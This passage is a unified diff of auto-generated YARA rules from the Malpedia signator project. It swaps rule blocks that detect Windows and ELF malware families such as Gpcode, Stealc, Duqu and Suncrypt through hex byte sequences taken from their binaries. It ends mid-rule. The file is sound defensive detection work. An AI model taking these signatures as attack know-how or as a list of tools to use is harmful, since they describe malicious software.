MALPEDIA_Win_Sendsafe_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "de5cfc2b-ebd2-5b2c-afe8-802a7c966fb2" + id = "cb217c22-cbf0-508f-ac96-405f94d46039" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cradlecore_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sendsafe_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "50e3eefefe56e4c7c3dbb9ce61b4c12511d78dda94103f69f932673a673b2621" + logic_hash = "e90570bf37f8e67b125b5c0e63f782c1ecedcd1e6ef21243ea37efff8deeb91b" score = 75 quality = 75 tags = "FILE" @@ -139213,32 +142096,32 @@ rule MALPEDIA_Win_Cradlecore_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 03f2 eb5c 8b45f4 8b0c85f01f4300 f644190448 7437 } - $sequence_1 = { 720f 8b06 5f c60000 8bc6 } - $sequence_2 = { 83e908 8d7608 660fd60f 8d7f08 8b048db8734000 ffe0 f7c703000000 } - $sequence_3 = { e8???????? 51 51 53 8bd9 33c0 8945f0 } - $sequence_4 = { e8???????? 83c410 3bc3 75cf 0fb644240f e9???????? c74424340f000000 } - $sequence_5 = { 80fb5a 7e53 80fb2d 744e 80fb2e } - $sequence_6 = { 8b5df4 8b7df0 33f6 8bce 8b75fc } - $sequence_7 = { 7204 8b1e eb02 8bde 8b450c 33d2 8b4d08 } - $sequence_8 = { 59 50 8d45d0 8bce 50 e8???????? 837da010 } - $sequence_9 = { 53 50 68???????? 53 ff15???????? 8d4de8 c745e868747470 } + $sequence_0 = { ff36 f30f6f442438 8d442428 50 660fefc8 50 8b4608 } + $sequence_1 = { f20f5e15???????? f20f59ca f20f58c1 f20f2cc8 894dd4 8b550c 83ba381c000000 } + $sequence_2 = { e8???????? 8b8510feffff e9???????? 6800010000 8b9588feffff 52 e8???????? } + $sequence_3 = { c1e000 8b4dfc 0fbe1401 85d2 7409 8b45f8 83c001 } + $sequence_4 = { e8???????? 83c40c 8983b0010000 85c0 750a 6815060000 e9???????? } + $sequence_5 = { e8???????? 83c414 85c0 0f84e1010000 ff7518 8d4704 57 } + $sequence_6 = { eb07 c745fc00000000 8b5508 8b4204 3b45fc 7404 33c0 } + $sequence_7 = { 8b783c 037904 8b8610010000 8bef c1f808 896c2414 8807 } + $sequence_8 = { 8b4620 83c408 314500 8b4624 314504 8b4628 314648 } + $sequence_9 = { eb06 8b55f4 8955f0 b801000000 6bc800 8b55f0 0fbe040a } condition: - 7 of them and filesize <450560 + 7 of them and filesize <3743744 } -rule MALPEDIA_Win_Powershellrunner_Auto : FILE +rule MALPEDIA_Win_Gpcode_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "52f34db7-4f5a-5a7d-b993-5b0a17757274" + id = "d8b81e5a-8691-5b0a-9c29-2fe185a250cc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powershellrunner" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.powershellrunner_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gpcode_auto.yar#L1-L188" license_url = "N/A" - logic_hash = "c0bbeb809fa33bde57fda2fd6bac480ecf51cfd19b2b4c46994cda378bb784a0" + logic_hash = "47d13f6f4636c7a610d9f5f6fa6bfc46db8fee0da3e7f134864d9085143c9558" score = 75 quality = 75 tags = "FILE" @@ -139252,32 +142135,41 @@ rule MALPEDIA_Win_Powershellrunner_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4889442440 488b442420 488b8c2498000000 482bc8 488bc1 4c8bc0 488b542440 } - $sequence_1 = { 488d4c2448 e8???????? 0fb6c0 85c0 7439 } - $sequence_2 = { 668984240e020000 b828000000 6689842410020000 b828000000 6689842412020000 b867000000 6689842414020000 } - $sequence_3 = { 488bcd 488d1529b20100 83e13f 488bc5 48c1f806 48c1e106 48030cc2 } - $sequence_4 = { 6689842488000000 b865000000 668984248a000000 b872000000 668984248c000000 b86e000000 668984248e000000 } - $sequence_5 = { 4833c4 4889842428010000 48c744245800000000 48c744246800000000 c744244c00000000 c744244800000000 b853000000 } - $sequence_6 = { f30f6f0f 4883f80e 7773 8b848654da0100 4803c6 ffe0 } - $sequence_7 = { e8???????? 4889442458 488b8c2490000000 e8???????? 4889442448 } - $sequence_8 = { 48894c2408 48b8ffffffffffffff1f c3 48894c2408 48b8ffffffffffffff3f c3 4c894c2420 } - $sequence_9 = { 4c8d0df9b30000 488be9 4c8d05e7b30000 488d15e8b30000 b914000000 e8???????? 4885c0 } + $sequence_0 = { e8???????? a1???????? a3???????? 6800001000 68???????? ff35???????? } + $sequence_1 = { 68???????? e8???????? 91 6a00 } + $sequence_2 = { e8???????? e8???????? c705????????01000000 c3 55 8bec } + $sequence_3 = { 85c0 7479 33c0 50 50 6a03 50 } + $sequence_4 = { ff35???????? 68???????? ff75f8 ff15???????? 8945f4 85c0 7425 } + $sequence_5 = { 8906 83c608 e2e6 59 e2dc } + $sequence_6 = { 83c40c 8d45fc 50 8d450c ff30 e8???????? } + $sequence_7 = { e8???????? 0bc0 7504 33c0 c9 c3 8945f0 } + $sequence_8 = { c60000 2d???????? 50 8d85e8feffff 50 68???????? } + $sequence_9 = { 68???????? 6a00 e8???????? 6a0a 68???????? 6a00 e8???????? } + $sequence_10 = { e8???????? 83f8ff 7505 5a } + $sequence_11 = { 001438 eb06 80c107 000c38 } + $sequence_12 = { 0005???????? 0fb605???????? 8ad3 8d80b8fee014 } + $sequence_13 = { 0016 40 3bc3 72de } + $sequence_14 = { 0145f0 8b4df0 3b4d14 0f8263feffff } + $sequence_15 = { 000c38 40 3b45f8 72e3 } + $sequence_16 = { 0144240c 85f6 7fdd 33c0 } + $sequence_17 = { 0106 eb94 55 8bec } + $sequence_18 = { 000e eb08 02c9 b2f9 } condition: - 7 of them and filesize <458752 + 7 of them and filesize <761856 } -rule MALPEDIA_Win_Duqu_Auto : FILE +rule MALPEDIA_Win_Sidewalk_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4f983d2e-8e54-5fa3-99e8-f35467f58ba0" + id = "14b78b08-c08d-56d8-91d9-454c97efb0a9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.duqu_auto.yar#L1-L157" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sidewalk_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "c9f95c9fbccbdcbcab2eb713244b96d59984c1db33c0129682f88201221bf820" + logic_hash = "db7fd110ccdf76bd73169627fa283b7d029f717432de6e469dcea6c6c2ec5ed7" score = 75 quality = 75 tags = "FILE" @@ -139291,38 +142183,35 @@ rule MALPEDIA_Win_Duqu_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bcb e8???????? bacdc185ad 89464c } - $sequence_1 = { 85f6 7eb3 b8c64ff867 8bde 8bd7 89442420 } - $sequence_2 = { 8b5c2414 85db 0f8402ffffff 46 } - $sequence_3 = { 85c0 0f848b020000 ba10ee27d3 8bcf e8???????? 894624 85c0 } - $sequence_4 = { 0f84f7000000 0fb706 b9ab4f5ecd 33c1 } - $sequence_5 = { 56 51 8bf2 e8???????? } - $sequence_6 = { 83c120 0fb7c9 8bc1 0fafc9 83e007 } - $sequence_7 = { 85c0 7465 e8???????? 85c0 } - $sequence_8 = { 55 8bec 81ec08020000 56 8bf2 8d95f8fdffff } - $sequence_9 = { 8bcb e8???????? bafa67937e 894648 8bcf } - $sequence_10 = { 8bf2 57 8d8e14020000 e8???????? } - $sequence_11 = { 8bf2 57 8d4e4c e8???????? } - $sequence_12 = { 8bf2 8bf9 ff15???????? 56 } - $sequence_13 = { 8bf2 57 8d8ecc000000 e8???????? } - $sequence_14 = { 8bf2 57 8d8e0c020000 e8???????? } - $sequence_15 = { 8bf2 57 8bf9 85f6 7425 66833e00 } + $sequence_0 = { 4403e8 4133db 418bcd c1c307 } + $sequence_1 = { 0bc8 41890c10 488d5204 4983e901 75d4 } + $sequence_2 = { 33c3 c1c207 c1c00c 4403c8 4533d1 } + $sequence_3 = { 488b05???????? 83780c00 7405 e8???????? } + $sequence_4 = { 488d040a 483bc6 7ce2 4883c640 } + $sequence_5 = { 8bc2 33c6 c1c010 4403d8 4133db } + $sequence_6 = { 750e 488bcf ff15???????? 4885c0 } + $sequence_7 = { c1c610 4433f2 c1c710 4403df 41c1c610 4503e6 } + $sequence_8 = { 41c1c610 4503e6 4403cb 4533d1 4403ee 41c1c210 418bc3 } + $sequence_9 = { 884202 884a03 4183f810 7ccc } + $sequence_10 = { 0fb642fe c1e108 0bc8 41890c10 } + $sequence_11 = { ff15???????? 4885c0 750e 488bcf } + $sequence_12 = { 8a040f 3201 41880408 48ffc1 } condition: - 7 of them and filesize <18759680 + 7 of them and filesize <237568 } -rule MALPEDIA_Win_Stealc_Auto : FILE +rule MALPEDIA_Win_Mgbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "539cf538-cfac-56e1-8a82-eaf8270c6c0b" + id = "dd03dc94-bb3a-5cad-8f13-4bbe4b7f90a6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stealc_auto.yar#L1-L108" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mgbot_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "6bf18991e2a395daac8cbfec9f407668e110581410c7e2de7aedba9cee95d9f0" + logic_hash = "7310ce51cc81391fc78e9881bf8f490b2a783d4789728f7661df3e6bdca512d7" score = 75 quality = 75 tags = "FILE" @@ -139336,32 +142225,32 @@ rule MALPEDIA_Win_Stealc_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 85c0 7507 c685e0feffff43 } - $sequence_1 = { 68???????? e8???????? e8???????? 83c474 } - $sequence_2 = { 50 e8???????? e8???????? 83c474 } - $sequence_3 = { e8???????? e8???????? 81c480000000 e9???????? } - $sequence_4 = { 50 e8???????? e8???????? 81c484000000 } - $sequence_5 = { e8???????? 83c460 e8???????? 83c40c } - $sequence_6 = { e8???????? e8???????? 83c418 6a3c } - $sequence_7 = { ff15???????? 50 ff15???????? 8b5508 8902 } - $sequence_8 = { 50 ff15???????? 8b5508 8902 } - $sequence_9 = { 7405 394104 7d07 8b4908 3bca 75f0 8bf9 } + $sequence_0 = { 6808020000 e8???????? 6804010000 8bf0 6a00 } + $sequence_1 = { 6808020000 e8???????? 6804010000 8bf0 6a00 56 e8???????? } + $sequence_2 = { 5b 8be5 5d c20800 6808020000 } + $sequence_3 = { 6808020000 e8???????? 6804010000 8bf0 6a00 56 } + $sequence_4 = { 8be5 5d c20800 6808020000 e8???????? } + $sequence_5 = { 6808020000 e8???????? 6804010000 8bf0 } + $sequence_6 = { 5d c20800 6808020000 e8???????? } + $sequence_7 = { 8be5 5d c20800 6808020000 } + $sequence_8 = { 5b 8be5 5d c20800 6808020000 e8???????? } + $sequence_9 = { 0f8553ffffff 5f 33c0 5e } condition: - 7 of them and filesize <4891648 + 7 of them and filesize <1677312 } -rule MALPEDIA_Win_Adylkuzz_Auto : FILE +rule MALPEDIA_Win_Shareip_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "092d1cf3-18b6-52f1-b243-99d6007e2b3c" + id = "1e2be420-f7e3-538b-a25d-892f460d058e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.adylkuzz_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shareip_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "de89fec9458f93b8b7ae503a1f8b6b5fd97e3b1bb1f58b10dd0b4e8fc16d178d" + logic_hash = "22b55834a3d563030497f1fde153bdd0a045ee32bc87427f1091c9e8cd08bbb9" score = 75 quality = 75 tags = "FILE" @@ -139375,34 +142264,34 @@ rule MALPEDIA_Win_Adylkuzz_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f5 f8 0fb7bc79b0010000 81fa00000001 0f833a000000 3b45fc 0f83c3fc0100 } - $sequence_1 = { 8b44242c 8b4804 894c2428 8b4a04 894c2430 8b08 8b02 } - $sequence_2 = { e8???????? 807e053d 8944240c 8d4340 754b 89e9 bafe00008d } - $sequence_3 = { 891c24 e8???????? c744240401000000 891c24 e8???????? 85c0 7518 } - $sequence_4 = { f9 663bc9 33d8 03f8 e9???????? 8b442500 660fbdd5 } - $sequence_5 = { f8 f5 03f8 e9???????? ff742500 055a2dd112 8dad04000000 } - $sequence_6 = { 89442408 8b4510 89442404 8b03 890424 e8???????? 8b550c } - $sequence_7 = { f6c3d8 2dc4275e67 2bce 660fc8 66d3c0 fec8 8d440aa4 } - $sequence_8 = { e9???????? 8b4c2500 80c4f7 d2d8 648b01 89442500 81ee04000000 } - $sequence_9 = { c7442404ffffffff 891c24 e8???????? 8974240c 89442408 c7442404???????? 891c24 } + $sequence_0 = { 8d8534feffff e9???????? 8d8da8feffff e9???????? 8d8558feffff e9???????? 8d8544ffffff } + $sequence_1 = { 894638 85c9 740f 8bd0 8d4900 8a01 8802 } + $sequence_2 = { 8a8064954500 08443b1d 0fb64601 47 3bf8 76ea 8b7d08 } + $sequence_3 = { 395c2444 7426 3bc3 7422 50 e8???????? 8b4c2444 } + $sequence_4 = { 834dfcff 894614 83c40c 8d45e4 50 e8???????? 8b07 } + $sequence_5 = { 8b44241c 50 8d8c24a0010000 51 53 53 53 } + $sequence_6 = { 55 8d4c245c e8???????? 8bd8 895c2414 83fbff 7541 } + $sequence_7 = { 837de800 7e50 8b03 8b4804 0fb7541930 8d0419 8b4828 } + $sequence_8 = { 8b9a80f34400 33f3 8b4538 33db 8b553c 33c6 33d6 } + $sequence_9 = { 33c0 eb05 1bc0 83d8ff 3bc3 7506 895c2418 } condition: - 7 of them and filesize <6438912 + 7 of them and filesize <811008 } -rule MALPEDIA_Win_Concealment_Troy_Auto : FILE +rule MALPEDIA_Win_Badcall_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e9475a7d-b707-5e2f-9e3a-86f91b19814e" + id = "f6c1d400-6aaf-5cd3-88ab-d61e25f09ca7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.concealment_troy_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.badcall_auto.yar#L1-L157" license_url = "N/A" - logic_hash = "b699251c533e7fec5531f5ef6172ec9300c9329b32d1137bef102f716d43b763" + logic_hash = "789bf61f14e8f6f349ef8fa3798aaa8ef35e52eb6b6c01f584f1e407643e6f98" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -139414,32 +142303,38 @@ rule MALPEDIA_Win_Concealment_Troy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 6a04 6a00 6aff ff15???????? e8???????? 50 } - $sequence_1 = { 56 57 b900000000 8b7508 0fb68600010000 0fb69e01010000 33d2 } - $sequence_2 = { 894d80 c7458410000000 33c0 88440590 40 3d00010000 } - $sequence_3 = { 50 8d8c2438050000 51 e8???????? 8d942434030000 } - $sequence_4 = { 75f6 80bc242001000022 0f854e040000 6808020000 8d942434090000 } - $sequence_5 = { 51 e8???????? 8bf0 83c408 85f6 7523 } - $sequence_6 = { e8???????? 8d8c243c030000 68???????? 51 e8???????? } - $sequence_7 = { 50 ffd5 bb???????? 8bf8 e8???????? 8b35???????? 50 } - $sequence_8 = { 55 8bec 83e4f8 b834130000 e8???????? a1???????? 33c4 } - $sequence_9 = { 8b1495a0774100 c1e006 8d440224 802080 884dfd 8065fd48 884dff } + $sequence_0 = { 2bc6 3d00400000 7605 b800400000 } + $sequence_1 = { a3???????? a1???????? 50 c705????????04000000 } + $sequence_2 = { 7605 b800400000 8b4f04 6a00 50 } + $sequence_3 = { 7557 33c0 68???????? a3???????? a3???????? a3???????? } + $sequence_4 = { 48 7455 48 7434 } + $sequence_5 = { 8b6c2414 682c010000 8bcf e8???????? } + $sequence_6 = { 50 c705????????04000000 ff15???????? c20400 a1???????? } + $sequence_7 = { ff15???????? c20400 c705????????01000000 a1???????? 68???????? } + $sequence_8 = { 7434 83e803 7557 33c0 } + $sequence_9 = { 8954240a 66c74424080200 8954240e 894c240c 89542412 } + $sequence_10 = { 8b6c2414 8bc7 2bc6 3d00400000 } + $sequence_11 = { 85c0 7e3b 8b4604 8d542418 52 } + $sequence_12 = { 85db 8bf9 763f 8b6c2414 682c010000 } + $sequence_13 = { e8???????? 85c0 7534 8bc3 2bc6 3d00400000 } + $sequence_14 = { 83fe01 7518 53 ff15???????? } + $sequence_15 = { 85c0 740e 8b4c241c 51 6a01 } condition: - 7 of them and filesize <229376 + 7 of them and filesize <483328 } -rule MALPEDIA_Win_Suncrypt_Auto : FILE +rule MALPEDIA_Win_Grabbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "93d1d1b0-e368-5e85-941c-a502b4af6a15" + id = "02308264-bf9f-5ce5-8d58-a146011d85f3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.suncrypt_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grabbot_auto.yar#L1-L161" license_url = "N/A" - logic_hash = "3fd8ca759efc6a63a6777db0d881129a01860e6b4243db4bd8968c844a421043" + logic_hash = "fb36fa0cb6c01a8c284e94b423e764f2d45ce7cf14719bff3ffb20003d9572f1" score = 75 quality = 75 tags = "FILE" @@ -139453,32 +142348,38 @@ rule MALPEDIA_Win_Suncrypt_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 6a00 6a00 6a03 6a00 6a00 ff75b8 } - $sequence_1 = { 8b8d60ffffff 8945c8 8b856cffffff 8945ac 8b8564ffffff 8945cc 8b855cffffff } - $sequence_2 = { c645f84c c645f90e c645fa44 c645fb4c c645fc4c 8a45f4 c645fd00 } - $sequence_3 = { 02ca 0fbec0 33c8 884c15ec 42 83fa11 72e8 } - $sequence_4 = { 894dd0 034d98 8bf9 337dcc c1c70c 03c7 898534ffffff } - $sequence_5 = { c3 8b07 0fb74f0e 8b4004 8b0488 894724 } - $sequence_6 = { 8b7308 83c140 8b7da0 894df4 8b4df0 eb7e } - $sequence_7 = { 8b45a8 0411 c645be00 83f00a 33d2 8845bd 8a45ac } - $sequence_8 = { 660f6dec 660fefd8 660f6ccc 0f28a500feffff 0f1118 83c010 0f1007 } - $sequence_9 = { 7324 8d0c10 2bf2 894df0 8b4df8 2bca } + $sequence_0 = { 0fb702 83f85a 770b 83f841 7206 } + $sequence_1 = { 83f85a 770d 83f841 7208 83c020 } + $sequence_2 = { 83f841 7206 83c020 0fb7c0 83c202 } + $sequence_3 = { ffd0 c3 b88dbdc13f 50 e8???????? } + $sequence_4 = { ffe0 c3 c3 c3 68b9be7238 e8???????? 50 } + $sequence_5 = { 03c7 813850450000 0f853c010000 0fb74804 ba4c010000 } + $sequence_6 = { 03c3 813850450000 8945f8 7408 32c0 } + $sequence_7 = { 7523 8b8c18a0000000 85c9 0f8489000000 837c187405 } + $sequence_8 = { 56 ffd0 33c9 66894c37fe } + $sequence_9 = { 7428 8b0d???????? 8908 8b0d???????? 894804 } + $sequence_10 = { 89480c e9???????? 33c0 e9???????? } + $sequence_11 = { 894808 8b0d???????? 89480c e9???????? } + $sequence_12 = { 8bf0 85f6 741d 8d4601 50 e8???????? } + $sequence_13 = { 85c0 56 0f9fc3 e8???????? 83c414 } + $sequence_14 = { ff15???????? a3???????? 85c0 7505 83c8ff } + $sequence_15 = { 741b 8d440002 50 e8???????? } condition: - 7 of them and filesize <172032 + 7 of them and filesize <1335296 } -rule MALPEDIA_Win_Opachki_Auto : FILE +rule MALPEDIA_Win_Diztakun_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "19945598-3be8-57e4-97f5-8518d611bbed" + id = "7edd86e4-2270-51c2-83a8-ad0918813862" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.opachki_auto.yar#L1-L168" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diztakun" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.diztakun_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "5313082ce77d197fd4bac8aec4c18a74cf4695d26acd8d2a84b13e24f5666e1a" + logic_hash = "6061dd34695b43b9aac4a4105a7b2b736c3a3c9564c659ddb77165c4b09e4e8b" score = 75 quality = 75 tags = "FILE" @@ -139492,38 +142393,32 @@ rule MALPEDIA_Win_Opachki_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c3 55 8bec 81ec00010000 ff7508 } - $sequence_1 = { 83c40c 8b4f04 8d0433 894708 c6040800 } - $sequence_2 = { 83c8ff 5f 5b 5e c9 c20800 8bc3 } - $sequence_3 = { 741c 8d4dd4 51 8d4df4 51 8d4dec } - $sequence_4 = { 885dfc e8???????? ff75e8 8d45f4 } - $sequence_5 = { ff7510 ff75fc ff15???????? 85c0 75e2 } - $sequence_6 = { 8b4608 8b4e04 c6040800 5f 8bc6 5e } - $sequence_7 = { 8bd8 7413 8b4704 03c8 53 } - $sequence_8 = { 8a0f 894508 84c9 744d 8a10 53 56 } - $sequence_9 = { c0e805 88470a 3c01 ac 7710 80fff6 7503 } - $sequence_10 = { aa 8944241c 61 c3 898389838983 898389838983 } - $sequence_11 = { f6c140 7412 08d2 7408 } - $sequence_12 = { 884707 83c140 eb0a 3ca0 7206 3ca3 } - $sequence_13 = { 7404 3c65 7505 884703 ebcc } - $sequence_14 = { f3aa 83ef25 8b742424 ac } - $sequence_15 = { 898389838983 898389838585 858585858585 878593859a9a } + $sequence_0 = { 4a 85d2 0f8fb3010000 8b08 8b11 50 } + $sequence_1 = { 51 ff15???????? 8d742408 e8???????? 5f } + $sequence_2 = { 8b08 8b11 50 8b4204 ffd0 c68424d807000019 8b442430 } + $sequence_3 = { 83e01f c1f905 8b0c8d60d74400 c1e006 03c1 f6400401 7524 } + $sequence_4 = { 8945f4 8b4514 40 c745ec3f344200 894df8 } + $sequence_5 = { 50 889c24e4070000 e8???????? 83c40c c68424d807000011 } + $sequence_6 = { 8b4c240c 8b5720 8d442408 50 51 } + $sequence_7 = { 85d2 740b 8b450c 8b80a4914400 eb09 8b450c 8b8070914400 } + $sequence_8 = { e8???????? 59 59 85c0 0f84d9000000 68???????? 53 } + $sequence_9 = { e8???????? 83bfac00000000 755e 8d4c2474 51 8d54241c 52 } condition: - 7 of them and filesize <122880 + 7 of them and filesize <688128 } -rule MALPEDIA_Elf_Hideandseek_Auto : FILE +rule MALPEDIA_Win_Boldmove_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8886e955-536d-56f5-a630-bf2b9ef8b07e" + id = "ede55e68-ab48-582c-bf7e-2cb826551211" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.hideandseek_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boldmove" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.boldmove_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "c312d2a4b534a00f51e15be6e1572c868a1bf84ffb4d93cf13ce0449e347f5bb" + logic_hash = "d529b7724e2e647d4848b38aca8e76a61b2caa5c4bf1c77fa8242a3dc71a9c2d" score = 75 quality = 75 tags = "FILE" @@ -139537,32 +142432,32 @@ rule MALPEDIA_Elf_Hideandseek_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 83ec14 8b44242c 8a5c2430 ff7004 ff74242c e8???????? } - $sequence_1 = { e8???????? 83c410 84c0 752e 83ec0c 8d84241c120000 50 } - $sequence_2 = { 8d44244c 50 e8???????? 5b 8d442440 50 e8???????? } - $sequence_3 = { 89ca 8b0424 0fa4d91e 31c8 8b4c2430 0fa4d31e 8b542404 } - $sequence_4 = { 7411 0f821e040000 83f802 0f8508040000 eb04 50 50 } - $sequence_5 = { be00000000 b800000000 c1e210 09c6 c1e718 31db 0fb64504 } - $sequence_6 = { 50 e8???????? 83c410 84c0 741a 8b542414 c7434403000000 } - $sequence_7 = { 817e0c00010000 751a 8d5610 8d4650 53 68c0000000 50 } - $sequence_8 = { 56 53 8b7c2410 803d????????00 7561 83ec0c 6800000011 } - $sequence_9 = { 50 8b8424ec000000 ff7008 e8???????? 89f2 8b8424f0000000 } + $sequence_0 = { 0fb655e4 d3e2 8b8b24300000 09d0 880431 31c0 } + $sequence_1 = { 891c24 e8???????? 893424 e8???????? 8b442434 85c0 } + $sequence_2 = { 0f85cf060000 c744246800000000 8b4c2434 b801000000 85c9 0f4fc1 8984249c000000 } + $sequence_3 = { 83cd02 89442448 e9???????? 8d4701 83cd08 89442448 } + $sequence_4 = { e8???????? 89c5 8b442438 892c24 89442404 e8???????? 8b4c2424 } + $sequence_5 = { 8b442420 89fb 8b10 e9???????? 85f6 7e03 83ee01 } + $sequence_6 = { 8b8314100000 31d2 39d0 740c 39b49318100000 7418 42 } + $sequence_7 = { 85db 0f84561d0000 81fe00040000 b800040000 0f4ec6 890424 89442440 } + $sequence_8 = { 8d4f04 7415 837c242801 0f8473050000 837c242805 7503 0fbec0 } + $sequence_9 = { 8b8310080000 31d2 39d0 740c 39b49314080000 } condition: - 7 of them and filesize <196608 + 7 of them and filesize <242688 } -rule MALPEDIA_Win_Alpc_Lpe_Auto : FILE +rule MALPEDIA_Win_Syscon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1d3d4f14-881f-5a73-b345-a76e12b3dfd0" + id = "10b2a70f-de71-5dcd-8008-91d876f6f351" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alpc_lpe_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.syscon_auto.yar#L1-L166" license_url = "N/A" - logic_hash = "21b1493d78b90781647fb0ea2e97a709ccc21e177ddf748dd3e2118819bbc37e" + logic_hash = "f7cdfe4679f457a034e50dc400c88cdf6f80bb02175055d824368da084861b59" score = 75 quality = 75 tags = "FILE" @@ -139576,32 +142471,38 @@ rule MALPEDIA_Win_Alpc_Lpe_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ba31000000 4c8d05b3a10000 448bcb 482bd6 e8???????? 4883c603 881f } - $sequence_1 = { 4533c0 48c7c102000080 4889442420 ff15???????? ff15???????? 488b4c2448 } - $sequence_2 = { 57 